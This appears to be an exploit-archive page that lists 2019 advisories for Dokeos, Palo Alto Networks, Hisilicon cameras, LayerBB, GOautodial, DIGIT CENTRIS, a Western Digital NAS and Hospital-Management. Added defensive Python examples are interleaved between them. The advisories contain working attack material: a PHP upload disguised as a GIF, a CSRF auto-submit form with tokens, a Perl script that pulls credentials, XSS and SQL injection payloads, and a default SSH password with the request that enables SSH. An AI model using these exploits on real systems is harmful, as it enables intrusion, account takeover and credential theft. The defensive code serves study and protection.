Dokeos versions 1.8.6.1 and 1.8.6.3 suffer from a remote file upload vulnerability via the bundled FCKeditor ImageManager plugin.

MD5 | cccfa27ec741adad16c37ee8e387648a

# Exploit Title: Dokeos 1.8.6.3 and 1.8.6.1 - Arbitrary File Upload
# Google Dork: "Plateforme Dokeos 1.8.6.3 " or 1.8.6.1
# Date: 17/09/2019
# Exploit Author: Sohel Yousef, Jellyfish Security Team
# Vendor Homepage: https://www.dokeos.com/
# Software Link: https://www.dokeos.com/
# Version: 1.8.6.3 - 1.8.6.1
# Tested on: Kali Linux
# CVE : N/A

# go to this directory to upload your file:
dokeos 1.8.6.3/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
# you can insert and upload files; rename your file to be like
backdoor.php.gif
# and add this GIF89;aGIF89;aGIF89;a before <?PHP
# so that it looks like this, for example:

GIF89;aGIF89;aGIF89;a

PHP Test






<?php echo '

FILE UPLOAD


';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "
TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "
FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "
file exists, try with another name"; }
else {
echo "
STARTING UPLOAD PROCESS
";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "
File UPLOADED:- ".$tgt_file; }

else { echo "
ERROR WHILE UPLOADING FILE
"; }
}
}
?>



# upload the file and you can find your file here in this image browser:
main/inc/lib/fckeditor/editor/plugins/ImageManager/images.php
# click and view the image / file and you will be here --->
dokeos/main/upload/users/0/my_files/.thumbs/.yourfile.php.gif
# remove .thumbs/. so the path looks like this
/main/upload/users/0/my_files/yourfile.php.gif
# and your file is ready
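The two weaknesses the steps above rely on are an upload handler that only looks at the last extension of the client-supplied name and one that trusts a few leading "GIF" bytes as proof of an image. The following is an added example, written for this page and not code from Dokeos or FCKeditor, of the server-side checks that close both gaps: the whole extension chain is inspected, the declared type must match real magic bytes at offset 0, a PHP open tag anywhere in a supposed image is rejected, and the stored name is generated rather than taken from the client. The allowed-extension list and the sample uploads are assumptions constructed for the demonstration.

```python
"""Server-side upload validation (added example, not Dokeos/FCKeditor code).

Demonstrates the checks that defeat the trick described in the advisory:
a double extension such as ``backdoor.php.gif`` and a faked image header
prepended to PHP source. Constructed sample uploads are embedded inline.
"""
import os
import re
import secrets
from typing import Tuple

# Extensions the image manager is meant to accept (assumption for this example).
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}
# Magic bytes that must begin the file for each accepted type.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
# Extensions that must never appear anywhere in a stored filename.
DANGEROUS_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "sh"}
# PHP open tags in any letter case; a file claiming to be an image must not contain them.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Accept only if every check passes."""
    base = os.path.basename(filename)          # strip any path component
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension or empty name"
    exts = parts[1:]
    # Any executable extension in the chain is rejected, not just the last one:
    # mod_mime style handlers can execute name.php.gif on misconfigured hosts.
    if DANGEROUS_EXT & set(exts):
        return False, "executable extension in filename chain"
    ext = exts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    # Content must match the claimed type exactly at offset 0; "GIF89;a" does not.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    # A real image never carries a PHP open tag; polyglots do.
    if PHP_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Discard the client's name entirely; keep only the validated extension."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples (not files from the advisory).
POLYGLOT = b"GIF89;aGIF89;aGIF89;a\n<?php echo 'FILE UPLOAD'; ?>"
REAL_GIF = b"GIF89a" + bytes(20)     # header plus padding, enough for the check


if __name__ == "__main__":
    for name, blob in (("backdoor.php.gif", POLYGLOT), ("photo.gif", REAL_GIF),
                       ("photo.gif", POLYGLOT), ("../../x.gif", REAL_GIF)):
        ok, why = validate_upload(name, blob)
        print(f"{name:20} -> {'accept' if ok else 'reject'} ({why})")
```

Storing the file under a generated name outside the web root, or at least in a directory where the web server has script execution disabled, is the complementary control: even if a check above is bypassed, nothing in the upload directory is ever handed to the PHP interpreter.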
################################################################################################


The user profile dashboard for paloaltonetworks.com suffered from a cross site request forgery vulnerability.

MD5 | 033bda102cbe55a0017caf9a1b421ed3

** Note: this vulnerability has already been fixed by the Palo Alto security team

# Exploit Title: Missing CSRF Token Leads to Full Account Takeover (All accounts can be hijacked)
# Google Dork: [N/A]
# Date: [Jul 23 2019]
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998
# Vendor Homepage: https://www.paloaltonetworks.com
# Software Link: N/A
# Version: [8.0]
# Tested on: [Parrot OS]
# CVE : [N/A]
# Acknowledgement: https://www.paloaltonetworks.com/security-researcher-acknowledgement

Summary
----------
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to
execute unwanted actions on a web application in which they're currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request.

Steps to reproduce
----------------------
>> Initially, the account should be authenticated.

>> For testing purposes I changed the email address, and the account was fully taken over.

If the HTML file does not work, then follow these steps:

>> go to profile settings

>> change your profile details

>> then intercept that request

>> then generate a CSRF PoC and try it in the browser... boom! account credentials will be changed.


PoC
---




history.pushState('', '', '/')
<form action="https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp" method="POST">
<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7" />
<input type="hidden" name="capture_transactionId" value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />
<input type="hidden" name="client_id" value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />
<input type="hidden" name="redirect_uri" value="http://localhost/" />
<input type="hidden" name="flow_version" value="20190502085125375950" />
<input type="hidden" name="First_Name__c" value="EMAIL_HIJACKED" />
<input type="hidden" name="Email_Display_Name" value="hpankajjj" />
<input type="hidden" name="Business_Email" value="pankajTESTHIJACKED@yopmail.com" />
<input type="hidden" name="Job_Role__c" value="Administrator" />
<input type="hidden" name="Alt_State_Province__c" value="" />
<input type="hidden" name="DataCenterVirtualization_hidden" value="" />
<input type="hidden" name="NextGenerationFirewall_hidden" value="" />
<input type="hidden" name="subscribeToNewsAndProductUpdates_hidden" value="" />
<input type="hidden" name="subscribeToEventsAndWebinars_hidden" value="" />
<input type="hidden" name="subscribeToUnit42ThreatResearch_hidden" value="" />

THANK YOU

PANKAJ KUMAR THAKUR

INDP. Security Researcher | Certified Ethical Hacker | Red Team at SYNACK Inc | OSCP


Hisilicon HiIpcam V100R003 suffers from a remote credential disclosure vulnerability.

MD5 | a331e0a4a6311b41063fcdc8715612bb

#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "\033[2J"; # clear the screen
print "\033[0;0H"; # jump to 0,0

my $banner = "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";

print $banner;

print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "\n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/

Index of /cgi-bin/

/)){
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "\n" for @files;
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[\n[ File Reading\n";
print "[ ", $_, "\n" for split(/\n/, $response->content());

} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}


LayerBB version 1.1.3 suffers from a cross site request forgery vulnerability.

MD5 | b599fecb0f9a19d1ceb90b55d70b84bc

# Exploit Title: LayerBB 1.1.3 - Multiple CSRF
# Date: 4/7/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30
# Version: 1.1.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-16531


1. Description:
LayerBB is free open-source forum software. Multiple CSRF vulnerabilities were found in it, such as in editing user profiles and forums.


2. Proof of Concepts:

[The PoC HTML forms did not survive extraction; only their visible labels remain. They covered the usergroup editor (permissions view_forum, create_thread, reply_thread, access_moderation and access_administration; the "This Usergroup is staff" flag; status Do Not Change / Active / Disabled; group User / Banned / Moderator / Administrator; group labels and badge colours Primary / Success / Info / Warning / Danger), the category and node order controls ("Use ENTER to save category order"), a custom captcha question ("Add an answer field"), and the profile/registration form (gender, timezone, country, birth date in YYYY-MM-DD, additional profile fields, LayerBB Captcha, and the forum rules agreement).]


3. Solution:
Update to 1.1.4
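Both CSRF advisories on this page (the Palo Alto Networks profile endpoint and the LayerBB admin and profile forms) come down to the same missing control: a state-changing POST is accepted because the browser attaches the session cookie, with nothing in the request proving the page that sent it was the site's own. The following is an added example, not code from either product, of the two server-side checks that block an auto-submitted cross-site form: a per-session synchronizer token compared in constant time, and an Origin (or Referer) check against the site's own origin. Requests are modelled as plain dicts, and the site origin and sample traffic are constructed assumptions.

```python
"""CSRF defence (added example; not code from paloaltonetworks.com or LayerBB).

Two independent checks every state-changing request must pass:
 1. a per-session synchronizer token carried in the request body and compared
    in constant time against the one bound to the session;
 2. the Origin header (falling back to Referer) must belong to the site.
Requests are represented as plain dicts; the site origin is an assumption.
Setting the session cookie with SameSite=Lax or Strict is the browser-side
complement and is not shown here.
"""
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"          # assumed deployment origin
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session() -> dict:
    """A session carries its own unpredictable CSRF token from creation."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def source_origin(headers: dict) -> Optional[str]:
    """Origin header first; browsers omit it on some same-origin requests,
    so fall back to the scheme://host of the Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def check_csrf(request: dict, session: dict) -> Tuple[bool, str]:
    """Return (allowed, reason) for a request {'method', 'headers', 'form'}."""
    if request["method"] in SAFE_METHODS:
        return True, "safe method"
    origin = source_origin(request["headers"])
    if origin is None:
        return False, "no Origin or Referer on state-changing request"
    if origin != SITE_ORIGIN:
        return False, f"cross-site origin {origin}"
    supplied = request["form"].get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed traffic for the demonstration.
SESSION = new_session()
LEGIT = {"method": "POST",
         "headers": {"Origin": SITE_ORIGIN},
         "form": {"Business_Email": "user@example.com",
                  "csrf_token": SESSION["csrf_token"]}}
# An auto-submitted form hosted on another site looks like this to the server:
# the cookie rides along, but the token is unknown and Origin is foreign.
FORGED = {"method": "POST",
          "headers": {"Origin": "https://attacker.example"},
          "form": {"Business_Email": "hijacked@example.com"}}
# Same-site form that omitted the token: still rejected.
NO_TOKEN = {"method": "POST",
            "headers": {"Referer": SITE_ORIGIN + "/profile"},
            "form": {"Business_Email": "user@example.com"}}

if __name__ == "__main__":
    for name, req in (("legit", LEGIT), ("forged", FORGED), ("no_token", NO_TOKEN)):
        print(name, check_csrf(req, SESSION))
```

The token check alone is sufficient when it is applied to every state-changing route; the origin check is cheap defence in depth for the route a developer forgot, and it also rejects the request before any form parsing happens.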


GOautodial version 4.0 suffers from a persistent cross site scripting vulnerability in the CreateEvent flow.

MD5 | 06e513908ec4cf29eb4b367076db6e10

# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2019-09-19
# Vendor Homepage: https://goautodial.org/
# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
# Tested Version: 4.0
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Simple XSS attack after application authentication.

# POST Request

POST /php/CreateEvent.php HTTP/1.1
Host: 10.0.0.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.25/events.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
Connection: close
DNT: 1

title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef
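The request above stores a `title` containing a script element, which the events page later writes into HTML unchanged. The following is an added example, not GOautodial code, that parses this exact request body and renders it two ways: the vulnerable way (verbatim interpolation) and the safe way, where the title is HTML-escaped for the element and attribute contexts and the `color` value, which lands in a CSS context where escaping does not help, is validated against a hex-colour allow-list instead. The rendering template and the allow-list are assumptions for the demonstration.

```python
"""Stored XSS defence for the CreateEvent body shown above (added example,
not GOautodial code). The request body is the one from the advisory; the
rendering template and the colour allow-list are assumptions for this example."""
import html
import re
from urllib.parse import parse_qs

# Body exactly as posted in the advisory (percent-encoded).
REQUEST_BODY = "title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef"

HEX_COLOR = re.compile(r"^#[0-9a-fA-F]{6}$")


def parse_event(body: str) -> dict:
    """Decode the urlencoded form into a flat dict of first values."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def safe_color(value: str) -> str:
    """CSS is a context where escaping does not help; allow-list instead.
    Anything that is not a six-digit hex colour falls back to a default."""
    return value if HEX_COLOR.match(value) else "#000000"


def render_event(event: dict) -> str:
    """Element content and attribute values get html.escape(quote=True); the
    CSS value is validated. The title text is preserved, just inert."""
    title = html.escape(event.get("title", ""), quote=True)
    color = safe_color(event.get("color", ""))
    return (f'<div class="event" style="background:{color}">'
            f'<span class="title" title="{title}">{title}</span></div>')


def render_event_unsafe(event: dict) -> str:
    """What the vulnerable page does: interpolates the stored title verbatim."""
    return f'<div class="event">{event.get("title", "")}</div>'


if __name__ == "__main__":
    ev = parse_event(REQUEST_BODY)
    print(render_event_unsafe(ev))   # script element reaches the browser
    print(render_event(ev))          # same text, no executable markup
```

The escaping is applied at output time, not when the value is stored, so the database keeps the user's literal text and every rendering path applies the encoding appropriate to its own context. A Content-Security-Policy without `unsafe-inline` is the usual second layer for the case where one template is missed.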


DIGIT CENTRIS 4 ERP suffers from a remote SQL injection vulnerability.

MD5 | 66111e2cb97a8f518d8d693b7be8b05d

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID

# [POST REQUEST]

POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"


Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).

MD5 | d5e290d2a09d4225693cebc37a83097f


Western Digital My Book World II NAS versions 1.02.12 and below have a hard-coded ssh credential that allows for remote command execution.

MD5 | 3808a885298919e8f753b294c96ace56

# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
# Google Dork: intitle:"My Book World Edition - MyBookWorld"
# Date: 19th Sep, 2019
# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
# Vendor Homepage: https://wd.com/
# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
# Version: <= 1.02.12
# Tested on: Firmware
# CVE : CVE-2019-16399

POST /admin/system_advanced.php?lang=en HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Content-Length: 241
orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
/*
The default password for SSH is 'welc0me', and the only security measure preventing SSH login is the disabled SSH port, which can be enabled with the above POST request. The attacker can then log in over SSH with the default password. The WD My Book World II NAS is very outdated hardware and Western Digital may never release an update for it. It is still using PHP 4, so it has more potential for remote exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
There is probably no update coming, and if you want to remain safe, abandon this NAS and switch to the latest hardware.
*/
Security Researcher - Noman Riffat, National Security Services Group (NSSG)
@nomanriffat, @nssgoman


macOS version 18.7.0 kernel local privilege escalation exploit that may only work on Macs before 2016.

MD5 | 8157e1ede5cfd34c7e3aa2019494c8bb


Hospital-Management version 1.26 suffers from a remote SQL injection vulnerability.

MD5 | b3bc4b70753666ea3c77040cafd689b7

# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-18
# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management
# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip
# Tested Version: 1.26
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Simple SQL injection after application authentication.

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:

fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:

fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add
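The DIGIT CENTRIS `datum1` probe (`1'"`) and the Hospital-Management `fname` payloads above both work only because the application splices the parameter text into the SQL statement. The following is an added example, not code from either product, that shows why parameter binding removes the entire class: the same two input values are run through a concatenated query, where the quote probe breaks the statement, and through bound parameters, where they are stored and compared as plain strings. It uses an in-memory SQLite database so it runs offline; the table layout is an assumption.

```python
"""Parameterised queries vs. string concatenation (added example; not code from
DIGIT CENTRIS or Hospital-Management). Uses an in-memory SQLite database so it
runs offline; the table layout is an assumption. The inputs are the two probe
values from the advisories above."""
import sqlite3

# Values taken from the advisories: a quote/double-quote probe and a string
# concatenation payload. Under parameter binding both are just text.
DATUM1_PROBE = "1'\""
FNAME_PAYLOAD = "tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'"


def setup() -> sqlite3.Connection:
    """Constructed schema standing in for the two applications' tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (id INTEGER PRIMARY KEY, fname TEXT, sname TEXT)")
    conn.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, datum1 TEXT, kid INTEGER)")
    conn.execute("INSERT INTO reports (datum1, kid) VALUES ('01.01.2001', 1)")
    return conn


def report_vulnerable(conn, datum1: str):
    """Concatenates user input into SQL: a quote in the value changes the statement."""
    sql = f"SELECT id FROM reports WHERE datum1 = '{datum1}'"
    return conn.execute(sql).fetchall()


def report_safe(conn, datum1: str):
    """Placeholder binding: the driver passes the value separately from the SQL text."""
    return conn.execute("SELECT id FROM reports WHERE datum1 = ?", (datum1,)).fetchall()


def add_patient_safe(conn, fname: str, sname: str) -> str:
    """Insert with bound parameters and read back exactly what was stored."""
    cur = conn.execute("INSERT INTO patients (fname, sname) VALUES (?, ?)", (fname, sname))
    return conn.execute("SELECT fname FROM patients WHERE id = ?", (cur.lastrowid,)).fetchone()[0]


def probe_breaks_query(conn, value: str) -> bool:
    """True when concatenating the value produces a syntax error. That error is
    what the quote probe in the advisories looks for, and a database error
    rate on a form handler is also a useful detection signal for defenders."""
    try:
        report_vulnerable(conn, value)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    conn = setup()
    print("concatenated probe breaks SQL:", probe_breaks_query(conn, DATUM1_PROBE))
    print("parameterised probe result   :", report_safe(conn, DATUM1_PROBE))
    print("stored fname verbatim        :", add_patient_safe(conn, FNAME_PAYLOAD, "tester"))
```

Binding also covers the `KID` and `PID` integer parameters: casting them to `int` before binding rejects non-numeric input outright, and binding them as integers means no quoting logic exists for a payload to escape from.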
